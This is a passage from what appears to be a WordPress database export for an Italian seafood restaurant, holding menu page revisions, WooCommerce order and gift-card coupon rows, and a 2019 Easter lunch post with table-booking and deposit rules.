Seppia cotte a bassa temperatura“Allo scoglio”, con frutti di mare e crostacei</em>\r\n\r\n<em>(Servita a temperatura ambiente)</em>\r\n\r\n<em>€ 14,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Insalatina di Calamari scottati ,puntar elle alle Acciughe del cantabrico e crema di cicoria </em>\r\n\r\n<em>€ 14,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Le noci di Capasanta alla piastra, su soffice di finocchio allo zenzero, maionese e polvere di corallo (4pz)</em>\r\n\r\n<em>€ 13,00 </em>\r\n\r\n<em> </em>\r\n\r\n<em>Le piadine fritte ripiene di Sardoncini grigliati, radicchio ,cipolla di tropea e squacquerone</em>\r\n\r\n<em>€ 12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Seppiolino Nostrano con il suo ragù e soffice di topinambur </em>\r\n\r\n<em>€14,00</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>….storici   </em>\r\n\r\n<em> </em>\r\n\r\n<em>L’ antipasto misto freddo ,secondo pescato </em>\r\n\r\n<em>€ 13 ,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>I gamberi alla greca (dal 1994)</em>\r\n\r\n<em>con pomodoro fresco e formaggio fuso</em>\r\n\r\n<em>€ 15,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Per chi non mangia pesce</em>\r\n\r\n<em> </em>\r\n\r\n<em>Il pinzimonio di verdure (vegano)</em>\r\n\r\n<em>€ 7,oo</em>\r\n\r\n<em>L’ insalatina aromatica alla frutta (vegano)</em>\r\n\r\n<em>€ 9,00</em>\r\n\r\n<em>La julienne di zucchine marinate con i pinoli (vegano)</em>\r\n\r\n<em>€ 8,oo</em>\r\n\r\n<em>La parmigiana di melanzane</em>\r\n\r\n<em>€ 10,0o</em>\r\n\r\n<em> </em>\r\n\r\n<em>In questo ristorante possono essere utilizzati prodotti surgelati all’origine(nella fattispecie di gamberi e calamari) tuttavia è nostro scrupolo selezionare, anche in questo caso, sempre</em> <em>la qualità migliore</em>','Antipasti Cotti','','inherit','closed','closed','','47-revision-v1','','','2019-02-12 14:12:37','2019-02-12 13:12:37','',47,'https://www.ristorantesolymar.it/2019/02/12/47-revision-v1/',0,'revision','',0),(755,2,'2019-02-12 14:14:52','2019-02-12 13:14:52','<em> Il Pesce</em>\r\n\r\n<em>(Secondi Piatti )</em>\r\n\r\n<em>Il tataki di ricciola alla soia con macedonia di frutta e verdura e cremoso di avocado</em>\r\n\r\n<em>€19,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Le mazzancolle nostrane alla griglia con pinzimonio di verdure </em>\r\n\r\n<em>€ 22,oo     </em>\r\n\r\n<em> </em>\r\n\r\n<em>Il filetto di rombo chiodato ai profumi mediterranei su schiacciata di patate e maionese di polipo (120/140 gr)</em>\r\n\r\n<em>€ 19,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Millefoglie tiepida di baccalà cotto a bassa temperatura con carciofi, pomodorini confit e timo</em>\r\n\r\n<em>€ 19,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La nostra catalana tiepida di astice e mazzancolle nostrane</em>\r\n\r\n<em>€ 22,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La frittura mista con verdurine croccanti</em>\r\n\r\n<em>€ 23,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La mezza porzione di frittura con verdurine croccanti</em>\r\n\r\n<em>€ 14,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Lo spiedone di pesce grigliato e insalatina mista al balsamico</em>\r\n\r\n<em>(la nostra grigliata per pigri)</em>\r\n\r\n<em>€ 19,00</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Per chi non mangia pesce </em>\r\n\r\n<em> </em>\r\n\r\n<em>L’ hamburger di soia (vegano)       € 9,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Il cannolo croccante di pasta filo e verdure al curry     € 11,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Le crocchette dorate alle verdure (vegano)         € 11,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Lo scortichino di seitan e tofu con verdure croccanti al balsamico (vegano)       € 11,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>La fritturina di verdure (vegano)         € 11,00</em>\r\n\r\n<em> </em>','Il Pesce','','inherit','closed','closed','','108-revision-v1','','','2019-02-12 14:14:52','2019-02-12 13:14:52','',108,'https://www.ristorantesolymar.it/2019/02/12/108-revision-v1/',0,'revision','',0),(756,2,'2019-02-12 14:17:29','2019-02-12 13:17:29','<em>Il Crudo</em>\r\n\r\n<em>Il Gran Crudo</em>\r\n\r\n<em>3 ostriche 3 sashimi 3 tipi di crostacei   </em>\r\n\r\n<em>€ 38,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La tartare di mazzancolle su crumble di nocciole e foie gras con confettura di cipolla di tropea</em>\r\n\r\n<em>€ 14,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La tavolozza di crudità</em>\r\n\r\n<em>€ 18,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La tartare di tonno con  pistacchi, melanzane, pomodori arrostiti e squacquerone</em>\r\n\r\n<em>€13,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La tartare di orata con zenzero e mela verde</em>\r\n\r\n<em>€13,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Il carpaccio di ricciola alla mediterranea </em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Le fettuccine di spigola alla carbonara </em>\r\n\r\n<em>€ 12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Le ostriche secondo la carta del giorno</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Gli scampi nostrani crudi</em>\r\n\r\n<em>€ 9,00 all’etto( min. 2 etti)</em>\r\n\r\n<em> </em>\r\n\r\n<em>Lo spaghetto “SUSHI”</em>\r\n\r\n<em>(spaghetto artigianale condito a freddo con il nostro pesce crudo)</em>\r\n\r\n<em>€ 16,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Mise en place, coperto e servizio 3,00 €</em>\r\n\r\n<em>Il pesce destinato ad essere consumato crudo è stato sottoposto a </em>\r\n\r\n<em>trattamento di bonifica preventiva conforme alle prescrizioni del regolamento (CE)835/2004</em>\r\n\r\n<em> </em>','Pesce Crudo','','inherit','closed','closed','','49-revision-v1','','','2019-02-12 14:17:29','2019-02-12 13:17:29','',49,'https://www.ristorantesolymar.it/2019/02/12/49-revision-v1/',0,'revision','',0),(758,1,'2019-02-12 14:18:18','2019-02-12 13:18:18','','Order &ndash; Febbraio 12, 2019 @ 02:18 PM','','wc-processing','open','closed','wc_order_aahPfJDfDzbkJ','ordine-feb-12-2019-0118-pm','','','2019-02-12 14:19:35','2019-02-12 13:19:35','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=758',0,'shop_order','',3),(759,2,'2019-02-12 14:19:39','2019-02-12 13:19:39','<em>Le dolcezze</em>\r\n\r\n<em> </em>\r\n\r\n<em>“Pina Colada”                                                                                                       € 7,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>“Sbagliando si impara”                                                                                        € 7,00                </em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>“Al contadino non far sapere”                                                                             € 7,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>“Una mela al giorno…”                                                                                         € 7,00                                                                                      </em>\r\n\r\n<em> </em>\r\n\r\n<em>“Pera,lampone e cioccolato”(gluten free –vegano)                                        € 7,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>La Crema Catalana                                                                                               € 5,50</em>\r\n\r\n<em> </em>\r\n\r\n<em>Il parfait al croccantino e spuma di zabaione                                                   € 6,50</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Il tortino al cioccolato con cuore fondente, </em>\r\n\r\n<em>gelato al caramello salato (tempo di cott. 15)                                                € 8,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Il semifreddo al mascarpone (gelateria Snoopy)                                          € 6,50</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Il sorbetto al caffè                                                                                                 € 4,00</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Per i più Piccoli</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Coppetta panna e cacao                                                                                        €2,50</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>La frutta fresca</em>\r\n\r\n<em>Ananas                                                                                                                     € 5,oo</em>','I Dolci','','inherit','closed','closed','','54-revision-v1','','','2019-02-12 14:19:39','2019-02-12 13:19:39','',54,'https://www.ristorantesolymar.it/2019/02/12/54-revision-v1/',0,'revision','',0),(760,2,'2019-02-12 14:22:35','2019-02-12 13:22:35','<em>   </em><em>Menù Degustazione </em>\r\n\r\n<em> </em>\r\n\r\n<em> ” Oggi”</em>\r\n\r\n<em>   </em><em>Entrée di Benvenuto</em>\r\n\r\n<em>  Degustazione di Antipasti (un crudo e due cotti)</em>\r\n\r\n<em>    La Pasta</em>\r\n\r\n<em>    Il Secondo</em>\r\n\r\n<em> Pre Dessert</em>\r\n\r\n<em> Il Dessert</em>\r\n\r\n<em>  € 50,oo cad *per tutto il tavolo (min due persone)</em>\r\n\r\n<em>  € 53,oo cad per una parte del tavolo (min due persone)</em>\r\n\r\n<em>  (bevande escluse)</em>\r\n\r\n<strong><em> </em></strong>\r\n\r\n<strong><em> </em></strong>\r\n\r\n<em> “ come 23 anni fa “</em>\r\n\r\n<em> Tonno in“Porchetta” su crema di finocchio e olio alle erbe aromatiche</em>\r\n\r\n<em> I Gamberi alla Greca</em>\r\n\r\n<em> Spaghetto “Pastificio dei Campi “ alle Vongole</em>\r\n\r\n<em> Frittura mista e Spiedone grigliato</em>\r\n\r\n<em> Sorbetto al caffè</em>\r\n\r\n<em> € 44,oo cad.*per tutto il tavolo( min 2 persone)</em>\r\n\r\n<em> € 46,oo cad. per una parte del tavolo(min 2 pers)</em>\r\n\r\n<em> (bevande escluse )</em>\r\n\r\n<em> I due Menù non sono ordinabili contemporaneamente allo stesso tavolo</em>\r\n\r\n* eccezione di singoli ,bambini e vegetariani','Le 5 portate dello chef','','inherit','closed','closed','','5-revision-v1','','','2019-02-12 14:22:35','2019-02-12 13:22:35','',5,'https://www.ristorantesolymar.it/2019/02/12/5-revision-v1/',0,'revision','',0),(761,1,'2019-02-12 19:15:45','2019-02-12 18:15:45','','Order &ndash; Febbraio 12, 2019 @ 07:15 PM','','wc-processing','open','closed','wc_order_DWdX6IypxiXyR','ordine-feb-12-2019-0615-pm','','','2019-02-12 19:18:47','2019-02-12 18:18:47','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=761',0,'shop_order','',3),(762,1,'2019-02-12 19:27:42','2019-02-12 18:27:42','','Rimborso &ndash; Feb 12, 2019 @ 06:27 PM','','wc-completed','closed','closed','wc_order_7sZjBPEBxgwUK','rimborso-feb-12-2019-0627-pm','','','2019-02-12 19:27:42','2019-02-12 18:27:42','',741,'https://www.ristorantesolymar.it/?shop_order_refund=rimborso-feb-12-2019-0627-pm',0,'shop_order_refund','',0),(763,1,'2019-02-12 19:36:00','2019-02-12 18:36:00','','Order &ndash; Febbraio 12, 2019 @ 07:36 PM','','wc-processing','open','closed','wc_order_SUYTBBiSo5Spb','ordine-feb-12-2019-0636-pm','','','2019-02-12 19:52:30','2019-02-12 18:52:30','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=763',0,'shop_order','',3),(764,1,'2019-02-13 11:12:01','2019-02-13 10:12:01','','Order &ndash; Febbraio 13, 2019 @ 11:12 AM','','wc-processing','open','closed','wc_order_vJDKQOzxa14u6','ordine-feb-13-2019-1012-am','','','2019-02-13 11:12:38','2019-02-13 10:12:38','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=764',0,'shop_order','',3),(765,1,'2019-02-13 12:12:01','2019-02-13 11:12:01','','Order &ndash; Febbraio 13, 2019 @ 12:12 PM','','wc-processing','open','closed','wc_order_MxJ6J8fkTIR6Q','ordine-feb-13-2019-1112-am','','','2019-02-13 12:14:34','2019-02-13 11:14:34','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=765',0,'shop_order','',3),(766,1,'2019-02-13 14:29:49','2019-02-13 13:29:49','','Order &ndash; Febbraio 13, 2019 @ 02:29 PM','','wc-processing','open','closed','wc_order_tqOzpP5dEeDuX','ordine-feb-13-2019-0129-pm','','','2019-02-13 14:31:51','2019-02-13 13:31:51','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=766',0,'shop_order','',3),(767,1,'2019-02-13 15:16:39','2019-02-13 14:16:39','','Order &ndash; Febbraio 13, 2019 @ 03:16 PM','','wc-processing','open','closed','wc_order_xtLtBqncYadGg','ordine-feb-13-2019-0216-pm','','','2019-02-13 15:19:12','2019-02-13 14:19:12','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=767',0,'shop_order','',3),(768,1,'2019-02-13 15:28:29','2019-02-13 14:28:29','','Order &ndash; Febbraio 13, 2019 @ 03:28 PM','','wc-processing','open','closed','wc_order_COBokAqSAfdv3','ordine-feb-13-2019-0228-pm','','','2019-02-13 15:31:50','2019-02-13 14:31:50','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=768',0,'shop_order','',3),(769,1,'2019-02-13 19:38:04','2019-02-13 18:38:04','','Order &ndash; Febbraio 13, 2019 @ 07:38 PM','','wc-processing','open','closed','wc_order_JHXInrtBqjjJi','ordine-feb-13-2019-0638-pm','','','2019-02-13 19:39:12','2019-02-13 18:39:12','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=769',0,'shop_order','',3),(770,1,'2019-02-14 10:02:08','2019-02-14 09:02:08','','Order &ndash; Febbraio 14, 2019 @ 10:02 AM','','wc-processing','open','closed','wc_order_Aew0pGcQQaDB7','ordine-feb-14-2019-0902-am','','','2019-02-14 10:03:34','2019-02-14 09:03:34','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=770',0,'shop_order','',3),(771,1,'2019-02-14 12:03:48','2019-02-14 11:03:48','','Order &ndash; Febbraio 14, 2019 @ 12:03 PM','','wc-processing','open','closed','wc_order_KydWAzrngoWKf','ordine-feb-14-2019-1103-am','','','2019-02-14 12:04:42','2019-02-14 11:04:42','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=771',0,'shop_order','',3),(772,1,'2019-02-14 14:35:05','2019-02-14 13:35:05','','Order &ndash; Febbraio 14, 2019 @ 02:35 PM','','wc-processing','open','closed','wc_order_DTSKgR6FITVbs','ordine-feb-14-2019-0135-pm','','','2019-02-14 14:37:05','2019-02-14 13:37:05','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=772',0,'shop_order','',3),(773,1,'2019-02-14 19:18:14','2019-02-14 18:18:14','','Order &ndash; Febbraio 14, 2019 @ 07:18 PM','','wc-processing','open','closed','wc_order_Evx0PLvrLZVqR','ordine-feb-14-2019-0618-pm','','','2019-02-14 19:19:11','2019-02-14 18:19:11','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=773',0,'shop_order','',3),(775,1,'2019-03-06 14:07:16','2019-03-06 13:07:16','','Order &ndash; Marzo 6, 2019 @ 02:07 PM','','wc-processing','open','closed','wc_order_fb5IcsWLviR2q','ordine-mar-06-2019-0107-pm','','','2019-03-06 14:08:04','2019-03-06 13:08:04','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=775',0,'shop_order','',2),(776,0,'2019-03-06 14:08:05','2019-03-06 13:08:05','GIFTCARD ORDER #775','solymarcoupon8KVBZ','GIFTCARD ORDER #775','publish','closed','closed','','solymarcoupon8kvbz','','','2019-03-06 14:08:05','2019-03-06 13:08:05','',0,'https://www.ristorantesolymar.it/2019/03/06/solymarcoupon8kvbz/',0,'shop_coupon','',0),(777,1,'2019-03-12 16:08:46','2019-03-12 15:08:46','','Order &ndash; Marzo 12, 2019 @ 04:08 PM','','wc-completed','open','closed','wc_order_HXDRevX9oJwrU','ordine-mar-12-2019-0308-pm','','','2019-03-12 16:33:45','2019-03-12 15:33:45','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=777',0,'shop_order','',3),(778,0,'2019-03-12 16:10:13','2019-03-12 15:10:13','GIFTCARD ORDER #777','solymarcouponTOSZB','GIFTCARD ORDER #777','publish','closed','closed','','solymarcoupontoszb','','','2019-03-12 16:10:13','2019-03-12 15:10:13','',0,'https://www.ristorantesolymar.it/2019/03/12/solymarcoupontoszb/',0,'shop_coupon','',0),(780,1,'2019-03-25 18:14:32','2019-03-25 17:14:32','','Order &ndash; Marzo 25, 2019 @ 06:14 PM','','wc-cancelled','open','closed','wc_order_1AgtJ1JpsoEbg','ordine-mar-25-2019-0514-pm','','','2019-03-25 19:02:41','2019-03-25 18:02:41','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=780',0,'shop_order','',1),(781,1,'2019-03-25 18:15:43','2019-03-25 17:15:43','','Order &ndash; Marzo 25, 2019 @ 06:15 PM','','wc-processing','open','closed','wc_order_5L3muLfOXVbB4','ordine-mar-25-2019-0515-pm','','','2019-03-25 18:18:57','2019-03-25 17:18:57','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=781',0,'shop_order','',2),(782,0,'2019-03-25 18:18:58','2019-03-25 17:18:58','GIFTCARD ORDER #781','solymarcouponBD8ML','GIFTCARD ORDER #781','publish','closed','closed','','solymarcouponbd8ml','','','2019-03-25 18:18:58','2019-03-25 17:18:58','',0,'https://www.ristorantesolymar.it/2019/03/25/solymarcouponbd8ml/',0,'shop_coupon','',0),(784,1,'2019-04-03 22:04:59','2019-04-03 20:04:59','<strong>Pranzo di Pasqua</strong>\r\n<em>Tartara  di ricciola cocco, zenzero e passion fruit\r\n\r\nRossetti fritti e salmorejo\r\n\r\nMazzancolle nostrane, asparagi e pompelmo rosa\r\n\r\nCappelletti ai carciofi con canocchie e pomodorini\r\n\r\nFiletto di ombrina all\'arancio e crema di sedano rapa\r\n\r\nNuvola soffice e croccante, panna cotta alla menta e zuppetta di fragole\r\n\r\n60€ a persona bevande escluse</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\nda 7 a 14 menù bambini a 30€\r\nDa 15 anni menù grandi\r\n\r\n[products category=\"pasqua\" columns=\"4\"]\r\n\r\n\r\n<strong>Pranzo di Pasquetta</strong>\r\nPrenotazione con caparra con le stesse modalità di Pasqua\r\n\r\n[products category=\"pasquetta\" columns=\"4\"]\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. Anche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente. La scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze. È possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante. Dopo tale data, la caparra pagata diventerà rimborso in caso di no show. Nel caso in cui le persone arrivate siano meno di quelle prenotate (senza disdetta entro la sopracitata data), le caparre degli assenti non \r\nsaranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. La ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo & Barbara\r\n','Menù di Pasqua e Pasquetta 2019','','publish','open','open','','menu-di-pasqua-e-pasquetta-2019','','','2019-04-11 20:51:44','2019-04-11 18:51:44','',0,'https://www.ristorantesolymar.it/?p=784',0,'post','',0),(786,1,'2019-04-03 22:03:22','2019-04-03 20:03:22','','happy-easter','','inherit','open','closed','','happy-easter','','','2019-04-03 22:03:22','2019-04-03 20:03:22','',784,'https://www.ristorantesolymar.it/wp-content/uploads/2019/04/happy-easter.jpg',0,'attachment','image/jpeg',0),(787,1,'2019-04-03 22:04:59','2019-04-03 20:04:59','<strong>Pranzo di Pasqua</strong>\r\n<em>Tartara  di ricciola cocco, zenzero e passion fruit\r\n\r\nRossetti fritti e salmorejo\r\n\r\nMazzancolle nostrane, asparagi e pompelmo rosa\r\n\r\nCappelletti ai carciofi con canocchie e pomodorini\r\n\r\nFiletto di ombrina all\'arancio e crema di sedano rapa\r\n\r\nNuvola soffice e croccante, panna cotta alla menta e zuppetta di fragole\r\n\r\n60€ a persona bevande escluse</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\nda 7 a 14 menù bambini a 30€\r\nDa 15 anni menù grandi\r\n\r\n[products category=\"pasqua\" columns=\"4\"]\r\n\r\n\r\n<strong>Pranzo di Pasquetta</strong>\r\nMenù alla carta,\r\nPrenotazione con caparra con le stesse modalità di Pasqua\r\n\r\n[products category=\"pasquetta\" columns=\"4\"]\r\n\r\nModalità di prenotazione per il pranzo di Pasqua e Pasquetta\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa \r\ncapienza, nel caso in cui non vi siano tavoli relativi al numero di \r\npersone richieste, è possibile acquistare più tavoli fino ad ottenere il \r\nnumero desiderato.\r\nAnche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 \r\nbambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini \r\nche stanno in carrozzina o passeggino, e non occupano la sedia, va \r\ncomunicato obbligatoriamente nelle note, onde evitare di non avere lo \r\nspazio sufficiente.\r\nLa scheda va compilata per intero, specificando numero di adulti ed \r\neventuali bambini, e la loro età(la caparra del bambino, se superiore al \r\nvalore di quanto consumato, sarà utilizzata sull’importo degli \r\nadulti),nome di chi consuma il pranzo e numero di cellulare \r\nraggiungibile, non che eventuali allergie o intolleranze.\r\nÈ possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA \r\nPARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale \r\ndella caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e \r\nle 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non \r\nsaranno considerate valide altre forme di contatto, ne disdette dopo il \r\nsuddetto orario) al ristorante.\r\nDopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nNel caso in cui le persone arrivate siano meno di quelle prenotate(senza \r\ndisdetta entro la sopracitata data), le caparre degli assenti non \r\nsaranno usufruibili dai presenti ma saranno sempre da considerarsi \r\nrimborso per no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, \r\npotete contattarci telefonicamente al ristorante o alla nostra pagina \r\nfacebook “ristorante sol y mar – riccione, o all’indirizzo di posta \r\nelettronica info@www.ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo & Barbara\r\n','Menù di Pasqua e Pasquetta 2019','','inherit','closed','closed','','784-revision-v1','','','2019-04-03 22:04:59','2019-04-03 20:04:59','',784,'https://www.ristorantesolymar.it/2019/04/03/784-revision-v1/',0,'revision','',0),(788,1,'2019-04-03 22:11:01','2019-04-03 20:11:01','<strong>Pranzo di Pasqua</strong>\n<em>Tartara  di ricciola cocco, zenzero e passion fruit\n\nRossetti fritti e salmorejo\n\nMazzancolle nostrane, asparagi e pompelmo rosa\n\nCappelletti ai carciofi con canocchie e pomodorini\n\nFiletto di ombrina all\'arancio e crema di sedano rapa\n\nNuvola soffice e croccante, panna cotta alla menta e zuppetta di fragole\n\n60€ a persona bevande escluse</em>\n\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\nda 7 a 14 menù bambini a 30€\nDa 15 anni menù grandi\n\n[products category=\"pasqua\" columns=\"4\"]\n\n\n<strong>Pranzo di Pasquetta</strong>\nMenù alla carta,\nPrenotazione con caparra con le stesse modalità di Pasqua\n\n[products category=\"pasquetta\" columns=\"4\"]\n\n<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2019/04/happy-easter-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-786\" />Tavolo per 8 persone giorno di Pasqua 2019 - anticipo caparra confirmatoria. La caparra si intende per 8 persone (30euro x 8)\n\n<strong>Pranzo di Pasqua</strong>\n<em>Tartara  di ricciola cocco, zenzero e passion fruit\n\nRossetti fritti e salmorejo\n\nMazzancolle nostrane, asparagi e pompelmo rosa\n\nCappelletti ai carciofi con canocchie e pomodorini\n\nFiletto di ombrina all\'arancio e crema di sedano rapa\n\nNuvola soffice e croccante, panna cotta alla menta e zuppetta di fragole\n\n60€ a persona bevande escluse</em>\n\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\nda 7 a 14 menù bambini a 30€\nDa 15 anni menù grandi\n\n\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. Anche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente. La scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze. È possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante. Dopo tale data, la caparra pagata diventerà rimborso in caso di no show. Nel caso in cui le persone arrivate siano meno di quelle prenotate (senza disdetta entro la sopracitata data), le caparre degli assenti non \nsaranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. La ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@ristorantesolymar.it\nGrazie per la comprensione\nTeo & Barbara\n','Menù di Pasqua e Pasquetta 2019','','inherit','closed','closed','','784-autosave-v1','','','2019-04-03 22:11:01','2019-04-03 20:11:01','',784,'https://www.ristorantesolymar.it/2019/04/03/784-autosave-v1/',0,'revision','',0),(789,1,'2019-04-03 22:11:14','2019-04-03 20:11:14','<strong>Pranzo di Pasqua</strong>\r\n<em>Tartara  di ricciola cocco, zenzero e passion fruit\r\n\r\nRossetti fritti e salmorejo\r\n\r\nMazzancolle nostrane, asparagi e pompelmo rosa\r\n\r\nCappelletti ai carciofi con canocchie e pomodorini\r\n\r\nFiletto di ombrina all\'arancio e crema di sedano rapa\r\n\r\nNuvola soffice e croccante, panna cotta alla menta e zuppetta di fragole\r\n\r\n60€ a persona bevande escluse</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\nda 7 a 14 menù bambini a 30€\r\nDa 15 anni menù grandi\r\n\r\n[products category=\"pasqua\" columns=\"4\"]\r\n\r\n\r\n<strong>Pranzo di Pasquetta</strong>\r\nMenù alla carta,\r\nPrenotazione con caparra con le stesse modalità di Pasqua\r\n\r\n[products category=\"pasquetta\" columns=\"4\"]\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. Anche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente. La scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze. È possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante 